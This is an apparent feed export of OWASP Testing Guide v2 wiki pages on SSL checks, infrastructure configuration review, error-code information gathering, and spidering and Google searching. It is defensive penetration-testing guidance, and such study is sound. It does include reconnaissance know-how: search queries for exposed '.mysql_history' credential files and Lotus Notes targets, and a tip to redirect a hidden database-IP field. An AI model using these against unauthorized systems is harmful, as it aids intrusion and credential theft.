&lt;br /&gt;
==References==&lt;br /&gt;
'''Whitepapers'''&amp;lt;br&amp;gt;&lt;br /&gt;
* [1] RFC2246. The TLS Protocol Version 1.0 (updated by RFC3546) - http://www.ietf.org/rfc/rfc2246.txt&lt;br /&gt;
* [2] RFC2817. Upgrading to TLS Within HTTP/1.1 - http://www.ietf.org/rfc/rfc2817.txt&lt;br /&gt;
* [3] RFC3546. Transport Layer Security (TLS) Extensions - http://www.ietf.org/rfc/rfc3546.txt&lt;br /&gt;
* [4] &amp;lt;u&amp;gt;www.verisign.net&amp;lt;/u&amp;gt; features various material on the topic&lt;br /&gt;
&lt;br /&gt;
'''Tools'''&lt;br /&gt;
&lt;br /&gt;
* Vulnerability scanners may include checks regarding certificate validity, including name mismatch and time expiration. They usually report other information as well, such as the CA which issued the certificate. Remember that there is no unified notion of a “trusted CA”; what is trusted depends on the configuration of the software and on the human assumptions made beforehand. Browsers come with a preloaded list of trusted CAs. If your web application relies on a CA which is not in this list (for example, because you rely on a self-made CA), you should take into account the process of configuring user browsers to recognize the CA.&lt;br /&gt;
&lt;br /&gt;
* The Nessus scanner includes a plugin to check for expired certificates or certificates which are going to expire within 60 days (plugin “SSL certificate expiry”, plugin id 15901). This plugin will check certificates ''installed on the server.&lt;br /&gt;
&lt;br /&gt;
* Vulnerability scanners may include checks against weak ciphers. For example, the Nessus scanner (http://www.nessus.org) has this capability and flags the presence of SSL weak ciphers (see example provided above).&lt;br /&gt;
&lt;br /&gt;
* You may also rely on specialized tools such as SSL Digger (http://www.foundstone.com/resources/proddesc/ssldigger.htm), or – for the command line oriented – experiment with the openssl tool, which provides access to OpenSSL cryptographic functions directly from a Unix shell (may be already available on *nix boxes, otherwise see www.openssl.org).&lt;br /&gt;
&lt;br /&gt;
* To identify SSL-based services, use a vulnerability scanner or a port scanner with service recognition capabilities. The nmap scanner features a “-sV” scanning option which tries to identify services, while the nessus vulnerability scanner has the capability of identifying SSL-based services on arbitrary ports and to run vulnerability checks on them regardless of whether they are configured on standard or non-standard ports.&lt;br /&gt;
&lt;br /&gt;
* In case you need to talk to a SSL service but your favourite tool doesn’t support SSL, you may benefit from a SSL proxy such as stunnel; stunnel will take care of tunneling the underlying protocol (usually http, but not necessarily so) and communicate with the SSL service you need to reach.&lt;br /&gt;
&lt;br /&gt;
* Finally, a word of advice. Though it may be tempting to use a regular browser to check certificates, there are various reasons for not doing so. Browsers have been plagued by various bugs in this area, and the way the browser will perform the check might be influenced by configuration settings that may not be evident. Instead, rely on vulnerability scanners or on specialized tools to do the job.&lt;br /&gt;
&lt;br /&gt;
[[Category:Cryptographic Vulnerability]]&lt;br /&gt;
[[Category:SSL]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Katie.mcdowell</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Test_Network/Infrastructure_Configuration_(OTG-CONFIG-001)&amp;diff=14833</id>
		<title>Test Network/Infrastructure Configuration (OTG-CONFIG-001)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Test_Network/Infrastructure_Configuration_(OTG-CONFIG-001)&amp;diff=14833"/>
				<updated>2007-01-02T21:56:44Z</updated>
		
		<summary type="html">&lt;p&gt;Katie.mcdowell: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
The intrinsic complexity of interconnected and heterogeneous web server infrastructure, which can count hundreds of web applications, makes configuration management and review a fundamental step in testing and deploying every single application.&lt;br /&gt;
In fact it takes only a single vulnerability to undermine the security of the entire infrastructure, and even small and (almost) unimportant problems may evolve into severe risks for another application on the same server.&lt;br /&gt;
In order to address these problems, it is of utmost importance to perform an in-depth review of configuration and known security issues.&lt;br /&gt;
&lt;br /&gt;
== Description of the Issue == &lt;br /&gt;
&lt;br /&gt;
Proper configuration management of the web server infrastructure is very important in order to preserve the security of the application itself. If elements such as the web server software, the back-end database servers, or the authentication servers are not properly reviewed and secured, they might introduce undesired risks or introduce new vulnerabilities that might compromise the application itself.&lt;br /&gt;
&lt;br /&gt;
For example, a web server vulnerability that would allow a remote attacker to disclose the source code of the application itself (a vulnerability that has arisen a number of times in both web servers or application servers) could compromise the application, as anonymous users could use the information disclosed in the source code to leverage attacks against the application or its users.&lt;br /&gt;
&lt;br /&gt;
In order to test the configuration management infrastructure, the following steps need to be taken:&lt;br /&gt;
&lt;br /&gt;
* the different elements that make up the infrastructure need to be determined in order to understand how they interact with a web application and how they affect its security&lt;br /&gt;
* all the elements of the infrastructure need to be reviewed in order to make sure that they don’t hold any known vulnerabilities&lt;br /&gt;
* a review needs to be made of the administrative tools used to maintain all the different elements&lt;br /&gt;
* the authentication systems, if any, need to reviewed in order to assure that they serve the needs of the application and that they cannot be manipulated by external users to leverage access.&lt;br /&gt;
* A list of defined ports which are required for the application should be maintained and kept under change control.&lt;br /&gt;
&lt;br /&gt;
== Black Box Testing and examples==&lt;br /&gt;
&lt;br /&gt;
===Review of the application architecture===&lt;br /&gt;
&lt;br /&gt;
The application architecture needs to be reviewed through the test to determine what different components are used to build the web application. In small setups, such as a simple CGI-based application, a single server might be used that runs the web server which executes the C, Perl, or Shell CGIs application, and perhaps authentication is also based on the web server authentication mechanisms. On more complex setups, such as an online bank system, multiple servers might be involved including: a reverse proxy, a front-end web server, an application server and a database server or LDAP server. Each of these servers will be used for different purposes and might be even be divided in different networks with firewalling devices between them, creating different DMZs so that access to the web server will not grant a remote user access to the authentication mechanism itself, and so that compromises of the different elements of the architecture can be isolated in a way such that they will not compromise the whole architecture.&lt;br /&gt;
&lt;br /&gt;
Getting knowledge of the application architecture can be easy if this information is provided to the testing team by the application developers in document form or through interviews, but can also prove to be very difficult if doing a blind penetration test.&lt;br /&gt;
&lt;br /&gt;
In the latter case, a tester will first start with the assumption that there is a simple setup (a single server) and will, through the information retrieved from other tests, derive the different elements and question this assumption that the architecture will be extended. He will start by making simple questions such as: “Is there a firewalling system protecting the web server?” which will be answered based on the results of network scans targeted at the web server and the analysis of whether the network ports of the web server are being filtered in the network edge (no answer or ICMP unreachables are received) or if the server is directly connected to the Internet (i.e. returns RST packets for all non-listening ports). This analysis can be enhanced in order to determine the type of firewall system used based on network packet tests: is it a stateful firewall or is it an access list filter on a router? How is it configured? Can it be bypassed? &lt;br /&gt;
&lt;br /&gt;
Detecting a reverse proxy in front of the web server needs to be done by the analysis of the web server banner, which might directly disclose the existence of a reverse proxy (for example, if ‘WebSEAL’[1]  is returned). It can also be determined by obtaining the answers given by the web server to requests and comparing them to the expected answers. For example, some reverse proxies act as “intrusion prevention systems” (or web-shields) by blocking known attacks targeted at the web server. If the web server is known to answer with a 404 message to a request which targets an unavailable page and returns a different error message for some common web attacks like those done by CGI scanners it might be an indication of a reverse proxy (or an application-level firewall) which is filtering the requests and returning a different error page than the one expected. Another example: if the web server returns a set of available HTTP methods (including TRACE) but the expected methods return errors then there is probably something in between, blocking them. In some cases, even the protection system gives itself away:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
GET / web-console/ServerInfo.jsp%00 HTTP/1.0&lt;br /&gt;
&lt;br /&gt;
HTTP/1.0 200&lt;br /&gt;
Pragma: no-cache&lt;br /&gt;
Cache-Control: no-cache&lt;br /&gt;
Content-Type: text/html&lt;br /&gt;
Content-Length: 83&lt;br /&gt;
&lt;br /&gt;
&amp;lt;TITLE&amp;gt;Error&amp;lt;/TITLE&amp;gt;&lt;br /&gt;
&amp;lt;BODY&amp;gt;&lt;br /&gt;
&amp;lt;H1&amp;gt;Error&amp;lt;/H1&amp;gt;&lt;br /&gt;
FW-1 at XXXXXX: Access denied.&amp;lt;/BODY&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Example of the security server of Check Point Firewall-1 NG AI “protecting” a web server'''&lt;br /&gt;
&lt;br /&gt;
Reverse proxies can also be introduced as proxy-caches to accelerate the performance of back-end application servers. Detecting these proxies can be done based, again, on the server header or by timing requests that should be cached by the server and comparing the time taken to server the first request with subsequent requests.&lt;br /&gt;
&lt;br /&gt;
Another element that can be detected: network balancers. Typically, these systems will balance a given TCP/IP port to multiple servers based on different algorithms (round-robin, web server load, number of requests, etc.). Thus, the detection of this architecture elements needs to be done by eamining multiple requests and comparing results in order to determine if the requests are going to the same or different web servers. For example, based on the Date: header if the server clocks are not synchronised. In some cases, the network load balance might inject new information in the headers that will make it stand out distinctively, like the AlteonP cookie introduced by Nortel’s Alteon WebSystems load balancer.&lt;br /&gt;
&lt;br /&gt;
Application web servers are usually easy to detect -- the request for several resources is handled by the application server itself (not the web server) and the response header will vary significantly (including different or additional values in the answer header). Another way to detect these is to see if the web servers tries to set cookies which are indicative of an application web server being used (such as the JSESSIONID provided by some J2EE servers) or to rewrite URLs automatically to do session tracking.&lt;br /&gt;
&lt;br /&gt;
Authentication backends (such as LDAP directories, relational databases, or RADIUS servers) however, are not as easy to detect from an external point of view in an immediate way, since they will be hidden by the application itself.&lt;br /&gt;
&lt;br /&gt;
The use of a database backend can be determined simply by navigating an application. If there is highly dynamic content generated “on the fly,&amp;quot; it is probably being extracted from some sort of database by the application itself. Sometimes the way information is requested might give insight to the existence of a database back-end. (For example, an online shopping application that uses numeric identifiers (‘id’) when browsing the different articles in the shop.) However, when doing a blind application test, knowledge of the underlying database is usually only available when some vulnerability surfaces in the application, such as an SQL injection, which indicates that the application is actually talking to a database (the vulnerability would not be possible otherwise).&lt;br /&gt;
&lt;br /&gt;
===Known server vulnerabilities===&lt;br /&gt;
&lt;br /&gt;
Vulnerabilities found in the different elements that make up the application architecture, be it the web server itself or the database backend, can severely compromise the application itself, more dangerously if a vulnerability had been found in the actual application. For example, consider a server vulnerability that allows a remote, unauthenticated user, to upload files to the web server, or even to replace files. This vulnerability would compromise the application, since a rogue user would be able to replace the application itself or introduce code that would affect the backend servers, as its application code would be run just like any other application.&lt;br /&gt;
&lt;br /&gt;
Reviewing server vulnerabilities can be hard to do if the test needs to be done through a blind penetration test. In these cases, vulnerabilities need to be tested from a remote site, typically using an automated tool; however, the testing of some vulnerabilities can have unpredictable results to the web server, and testing for others (like those directly involved in denial of service attacks) might not be possible due to the service downtime involved if the test was successful. Also, some automated tools will flag vulnerabilities based on the web server version retrieved. This leads to both false positives and false negatives: on one hand, if the web server version has been removed or obscured by the local site administrator, the scan tool will not flag the server as vulnerable even if it is; on the other hand, if the vendor providing the software does not update the web server version when vulnerabilities are fixed in it, the scan tool will flag vulnerabilities that do not exist. The later case is actually very common in some operating system vendors that do backport patches of security vulnerabilities to the software they provide in the operating system but do not do a full upload to the latest software version. This happens in most GNU/Linux distributions such as Debian, Red Hat or SuSE. In most cases, vulnerability scanning of an application architecture will only find vulnerabilities associated with the “exposed” elements of the architecture (such as the web server) and will usually be unable to find vulnerabilities associated to elements which are not directly exposed, such as the authentication backends, the database backends, or reverse proxies in use.&lt;br /&gt;
&lt;br /&gt;
Finally, not all software vendors disclose vulnerability information in public way, and information of the vulnerabilities present in their different releases is not published in vulnerability databases[2]. This info is only disclosed to customers or published through fixes that do not have accompanying advisories. This reduces the usefulness of vulnerability scanning tools. Typically, vulnerability coverage of these tools will be very good for common products (such as the Apache web server, Microsoft’s Internet Information Server, or IBM’s Lotus Domino) but will be lacking for lesser known products.&lt;br /&gt;
&lt;br /&gt;
This is why reviewing vulnerabilities is best done when the tester is provided internal information of the software used, including versions and releases used and patches applied to the software. With this information in its hand, the tester can retrieve the information from the vendor itself and analyse what vulnerabilities might be present in the architecture and how they can affect the application itself. When possible, these applications can be tested in order to determine their real effects and to detect if there might be any external elements (such as intrusion detection or prevention systems) that might reduce or negate the possibility of exploiting these vulnerabilities. Testers might even determine, through a configuration review, that the vulnerability is not even present, since it affects a software component that is not in use.&lt;br /&gt;
&lt;br /&gt;
It is also worthwhile to notice that vendors will sometimes silently fix vulnerabilities and make them available on new software releases. Different vendors will have difference release cycles that determines the support they might provide for older releases. A tester with detailed information of the software versions used by the architecture can analyse the risk associated to the use of old software releases that might be unsupported in the short term or are already unsupported. This is critical, since if a vulnerability were to surface in an old software version that is no longer suppoted, the systems personnel might not be direcdtly aware of it: no patches will be ever made available for it and advisories might not list that version as vulnerable (as it is unsupported). Even in the even that they are aware that the vulnerability is present and the system is, indeed, vulnerable, they will need to do a full upgrade to a new software release, which might introduce significant downtime in the application architecture or might force the application to be recoded due to incompatibilities with the latest software version.&lt;br /&gt;
===Administrative tools===&lt;br /&gt;
&lt;br /&gt;
Any web server infrastructure requires the existence of administrative tools to maintain and update the information used by the application: static content (web pages, graphic files), applications source code, user authentication databases, etc. Depending on the site, technology or software used administrative tools will differ. For example, some web servers will be managed using administrative interfaces which are, themselves, web servers (such as the iPlanet web server) or will be administrated by plain text configuration files (in the Apache case[3]) or use operating-system GUI tools (when using Microsoft’s IIS server or ASP.Net). In most cases, however, the server configuration will be handled using different tools than the maintenance of the files used by the web server, which are managed through FTP servers, WebDAV, network file systems (NFS, CIFS) or other mechanisms. Obviously, the operating system of the elements that make up the application architecture will also be managed using other tools. Applications may also have administrative interfaces embedded in them that are used to manage the application data itself (users, content, etc.)&lt;br /&gt;
&lt;br /&gt;
Review of the administrative interfaces used to manage the different parts of the architecture is very important, since if a user gains access to any of them he can then compromise or damage the application architecture. Thus it is important to:&lt;br /&gt;
&lt;br /&gt;
* list all the possible administrative interfaces.&lt;br /&gt;
* determine if administrative interfaces are available from an internal network or are also available from the Internet.&lt;br /&gt;
* if available from the Internet, determine  the access control methods used to access these interfaces their susceptibilities.&lt;br /&gt;
&lt;br /&gt;
Some sites do not directly manage the web server applications fully. These may have other companies manage the content provided by the web server application. This external company might either provide only parts of the content (news updates or promotions) or might manage the web server completely (including content and code). It is common to find administrative interfaces available from the Internet in these situations, since using the Internet is cheaper than providing a dedicated line that will connect the external company to the application infrastructure through a management-only interface. In this situation, it is very important to test if the administrative interfaces can be vulnerable to attacks. &lt;br /&gt;
&lt;br /&gt;
==References==&lt;br /&gt;
* [1] WebSEAL, also known as Tivoli Authentication Manager, is a reverse Proxy from IBM which is part of the Tivoli framework.&lt;br /&gt;
* [2] Such as Symantec’s Bugtraq, ISS’ Xforce, or NIST’s National Vulnerability Database (NVD)&lt;br /&gt;
* [3] There are some GUI-based administration tools for Apache (like NetLoony) but they are not in widespread use yet.&lt;br /&gt;
* [4] It is very common the use of database back-ends for authentication purposes with user tables that include the password that grants access to users in plain text.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Katie.mcdowell</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Testing_for_Error_Code_(OTG-ERR-001)&amp;diff=14832</id>
		<title>Testing for Error Code (OTG-ERR-001)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Testing_for_Error_Code_(OTG-ERR-001)&amp;diff=14832"/>
				<updated>2007-01-02T21:18:32Z</updated>
		
		<summary type="html">&lt;p&gt;Katie.mcdowell: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
&lt;br /&gt;
Often during a penetration test on web applications we come up against many error codes generated from applications or web servers.&lt;br /&gt;
It's possible to cause these errors to be displayed by using a particular request, either specially crafted with tools or created manually.&lt;br /&gt;
These codes are very useful to a pentester during his activities because they reveal a lot of information about databases, bugs, and other technological components directly linked with web applications.&lt;br /&gt;
During the first part we'll analyse the more common codes (error messages) and bring into focus the steps of vulnerability assessment.&lt;br /&gt;
The most important aspect for this activity is to focus one's attention on these errors, seeing them as a collection of information that will aid in next steps of our analysis,. A good collection can facilitate the penetration test efficiency by decreasing the time taken to perform the overall pentest activity.&lt;br /&gt;
&lt;br /&gt;
== Description of the Issue ==&lt;br /&gt;
&lt;br /&gt;
A common error that we can see during our search is the HTTP 404 Not Found.&lt;br /&gt;
Often we can see this error code with many details about web server and other components.&lt;br /&gt;
For Example:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Not Found&lt;br /&gt;
The requested URL /page.html was not found on this server.&lt;br /&gt;
Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7g  DAV/2 PHP/5.1.2 Server at localhost Port 80&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This error message can be generated with the insertion of non-existing URL.&lt;br /&gt;
After the common message that shows a page not found, there is information about web server version, OS, modules and other products used.&lt;br /&gt;
This information can be very important both for OS and for applications during a penetration test, but web server errors aren't the only errors useful in a security analysis.&lt;br /&gt;
&lt;br /&gt;
We will therefore the next occurrence that shows abnormal behavior:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Microsoft OLE DB Provider for ODBC Drivers (0x80004005)&lt;br /&gt;
[DBNETLIB][ConnectionOpen(Connect())] - SQL server does not exist or access denied &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
What's happened? We'll proceed step by step.&lt;br /&gt;
&lt;br /&gt;
For example, the 80004005 is a generic IIS error code which indicates that isn't possible to access a database.&amp;lt;br&amp;gt;&lt;br /&gt;
In many cases we can see that this code is followed by the version of the database. With this information, the pentester can plan an appropriate strategy for the security test.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Microsoft OLE DB Provider for ODBC Drivers error '80004005'&lt;br /&gt;
[Microsoft][ODBC Access 97 ODBC driver Driver]General error Unable to open registry key 'DriverId'&lt;br /&gt;
&amp;lt;/pre&amp;gt; 	&lt;br /&gt;
&lt;br /&gt;
The first example shows a connection error message obtained by SQL Server Database because the database server which linked into application is down or credentials don't allow access.&lt;br /&gt;
However, this isn't the only information that we know; in fact, in this way we have discovered the kind of operating system.&lt;br /&gt;
In this case we could verify if the web application permits change of variables value to connect to the database.&lt;br /&gt;
In the second case we can see a generic error in the same situation (we know the database version) but with a different error message and database server.&lt;br /&gt;
But in the end...It's the same thing!&lt;br /&gt;
&lt;br /&gt;
Now we will look at a practical example with a security test on web application that loses the link with the database server because there is badly written code (the next error message is caused by the application, which can't resolve the database server name or when the variable value is modified) or other network problems.&lt;br /&gt;
&lt;br /&gt;
For example, we have a database administration web portal which can be connected to db server after a log-on phase to realize queries, create tables and modify database fields.&lt;br /&gt;
During POST of credentials for the log-on phase meet this message that evidences the presence of a MySQL database server:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Microsoft OLE DB Provider for ODBC Drivers (0x80004005)&lt;br /&gt;
[MySQL][ODBC 3.51 Driver]Unknown MySQL server host&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
		&lt;br /&gt;
If we see in the HTML code of the log-on page the presence of a '''hidden field''' with a database IP, we can try to change this value in the URL with the address of another database (our database, for example).&lt;br /&gt;
Another example: knowing the database server that services a web application, we can take advantage of this information to carry out a SQL Injection for that kind of database or a persistent XSS test.&lt;br /&gt;
&lt;br /&gt;
Information Gathering on web applications with server-side technology is quite difficult, but the information discovered can be useful for the correct execution of an attempted exploit and can reduce false positives.&lt;br /&gt;
&lt;br /&gt;
== Black Box testing and example ==&lt;br /&gt;
&lt;br /&gt;
'''Test:'''&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
telnet &amp;lt;host target&amp;gt; 80&lt;br /&gt;
GET /&amp;lt;wrong page&amp;gt; HTTP/1.1&lt;br /&gt;
&amp;lt;CRLF&amp;gt;&amp;lt;CRLF&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
'''Result:'''&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
HTTP/1.1 404 Not Found&lt;br /&gt;
Date: Sat, 04 Nov 2006 15:26:48 GMT&lt;br /&gt;
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7g&lt;br /&gt;
Content-Length: 310&lt;br /&gt;
Connection: close&lt;br /&gt;
Content-Type: text/html; charset=iso-8859-1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
'''Test:'''&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
1. network problems&lt;br /&gt;
2. bad configuration about host database address&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
'''Result:'''&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Microsoft OLE DB Provider for ODBC Drivers (0x80004005) '&lt;br /&gt;
[MySQL][ODBC 3.51 Driver]Unknown MySQL server host&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
'''Test:'''&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
1. Authentication Failed&lt;br /&gt;
2. Credentials not inserted&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
'''Result:'''&lt;br /&gt;
&lt;br /&gt;
Firewall version used for authentication&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Error 407&lt;br /&gt;
FW-1 at &amp;lt;firewall&amp;gt;: Unauthorized to access the document.&lt;br /&gt;
•  Authorization is needed for FW-1.&lt;br /&gt;
•  The authentication required by FW-1 is: unknown.&lt;br /&gt;
•  Reason for failure of last attempt: no user&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Gray Box testing and example ==&lt;br /&gt;
&lt;br /&gt;
'''Test:'''&lt;br /&gt;
&lt;br /&gt;
Enumeration of the directories with access denied.&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
http://&amp;lt;host&amp;gt;/&amp;lt;dir&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
'''Result:'''&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Directory Listing Denied&lt;br /&gt;
This Virtual Directory does not allow contents to be listed.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Forbidden&lt;br /&gt;
You don't have permission to access /&amp;lt;dir&amp;gt; on this server.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* [1] [[http://www.ietf.org/rfc/rfc2616.txt?number=2616 RFC2616]] Hypertext Transfer Protocol -- HTTP/1.1&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Katie.mcdowell</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Testing:_Spidering_and_googling&amp;diff=14831</id>
		<title>Testing: Spidering and googling</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Testing:_Spidering_and_googling&amp;diff=14831"/>
				<updated>2007-01-02T21:05:28Z</updated>
		
		<summary type="html">&lt;p&gt;Katie.mcdowell: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
&lt;br /&gt;
In this paragraph is described how to retrieve informations about the application to test using spidering and googling techniques.&lt;br /&gt;
&lt;br /&gt;
== Description of the Issue == &lt;br /&gt;
&lt;br /&gt;
Web spiders are the most powerful and useful tools developed for both good and bad intentions on the Internet. A spider serves one major function, Data Mining. The way a typical spider (like Google) works is by crawling a website one page at a time, gathering and storing the relevant information such as email address, meta-tags, hidden form data, URL information, links, etc. The spider then crawls all the links in that page, collecting relevant information in each following page, and so on. Before you know it, the spider has crawled thousands of links and pages gathering bits of information and storing into a database. This web of paths is where the term 'spider' is derived from. &lt;br /&gt;
&lt;br /&gt;
The Google search engine found at http://www.google.com offers many features, including language and document translation; web, image, newsgroups, catalog, and news searches; and more. These features offer obvious benefits to even the most uninitiated web surfer, but these same features offer far more nefarious possibilities to the most malicious Internet users, including hackers, computer criminals, identity thieves, and even terrorists. This article outlines the more harmful applications of the Google search engine, techniques that have collectively been termed &amp;quot;Google Hacking.&amp;quot;&lt;br /&gt;
In 1992, there were about 15,000 websites, in 2006 the number has exceeded 100 million.   What if a simple query to a search engine like Google such as &amp;quot;Hackable Websites w/ Credit Card Information&amp;quot; produced a list of websites that contained customer credit card data of thousands of customers per company?  &lt;br /&gt;
If the attacker was aware of a web application that utilized a clear text password file in a directory and wanted to gather these targets, he could search on &amp;quot;intitle:&amp;quot;Index of&amp;quot; .mysql_history&amp;quot; and found on any of the 100 million websites the engine will provide you with a list of the database usernames and passwords. Or prehaps the attacker has a new method to attack a Lotus Notes web server and simply wants to see how many targets are on the Internet, he could search &amp;quot;inurl:domcfg.nsf&amp;quot;. Apply the same logic to a worm looking for its new victim.&lt;br /&gt;
&lt;br /&gt;
== Black Box testing and example ==&lt;br /&gt;
&lt;br /&gt;
===Spidering===&lt;br /&gt;
&lt;br /&gt;
'''Description and goal'''&lt;br /&gt;
&lt;br /&gt;
Our goal is to create a map of the application with all the points of access (gates) to the application.&lt;br /&gt;
This will be useful for the second active phase of pen testing.&lt;br /&gt;
You can use tool such as wget (powerful and very easy to use) to retrieve all the information published by the application.&lt;br /&gt;
&lt;br /&gt;
'''Test:'''&lt;br /&gt;
&lt;br /&gt;
The -s option is used to collect the HTTP header of the web requests. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
wget -s &amp;lt;target&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Result:'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
HTTP/1.1 200 OK&lt;br /&gt;
Date: Tue, 12 Dec 2006 20:46:39 GMT&lt;br /&gt;
Server: Apache/1.3.37 (Unix) mod_jk/1.2.8 mod_deflate/1.0.21 PHP/5.1.6 mod_auth_&lt;br /&gt;
passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.26&lt;br /&gt;
34a mod_ssl/2.8.28 OpenSSL/0.9.7a&lt;br /&gt;
X-Powered-By: PHP/5.1.6&lt;br /&gt;
Set-Cookie: PHPSESSID=b7f5c903f8fdc254ccda8dc33651061f; expires=Friday, 05-Jan-0&lt;br /&gt;
7 00:19:59 GMT; path=/&lt;br /&gt;
Expires: Sun, 19 Nov 1978 05:00:00 GMT&lt;br /&gt;
Last-Modified: Tue, 12 Dec 2006 20:46:39 GMT&lt;br /&gt;
Cache-Control: no-store, no-cache, must-revalidate&lt;br /&gt;
Cache-Control: post-check=0, pre-check=0&lt;br /&gt;
Pragma: no-cache&lt;br /&gt;
Connection: close&lt;br /&gt;
Content-Type: text/html; charset=utf-8&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Test:'''&lt;br /&gt;
&lt;br /&gt;
The -r option is used to collect recursively the web-site's content and the -D option restricts the request only for the specified domain.  &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
wget -r -D &amp;lt;domain&amp;gt; &amp;lt;target&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Result:'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
22:13:55 (15.73 KB/s) - `www.******.org/indice/13' saved [8379]&lt;br /&gt;
&lt;br /&gt;
--22:13:55--  http://www.******.org/*****/********&lt;br /&gt;
           =&amp;gt; `www.******.org/*****/********'&lt;br /&gt;
Connecting to www.******.org[xx.xxx.xxx.xx]:80... connected.&lt;br /&gt;
HTTP request sent, awaiting response... 200 OK&lt;br /&gt;
Length: unspecified [text/html]&lt;br /&gt;
&lt;br /&gt;
    [   &amp;lt;=&amp;gt;                                                                                                                                                                ] 11,308        17.72K/s                     &lt;br /&gt;
&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Googling===&lt;br /&gt;
&lt;br /&gt;
'''Description and goal'''&lt;br /&gt;
&lt;br /&gt;
The scope of this activity is to find the information about a single web-site published on the internet or to find a specific kind of application as Webmin or VNC.&lt;br /&gt;
There are many tools that carry out these specific queries as ''googlegath'' but it is possibile to perform this operation also using directly Google's search on the web-site.&lt;br /&gt;
This operation doesn't require an high technical skill and is a good way to collect information about a web target.  &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''' Tip cases of Advance Search with Google '''&lt;br /&gt;
&lt;br /&gt;
* Use the plus sign (+) to force a search for an overly common word. Use the minus sign (-) to exclude a term from a search. No spaces follow these signs.&lt;br /&gt;
* To search for a phrase, supply the phrase surrounded by double quotes (&amp;quot; &amp;quot;).&lt;br /&gt;
* A period (.) serves as a single-character wildcard.&lt;br /&gt;
* An asterisk (*) represents any word —- not the completion of a word, as is traditionally used.&lt;br /&gt;
&lt;br /&gt;
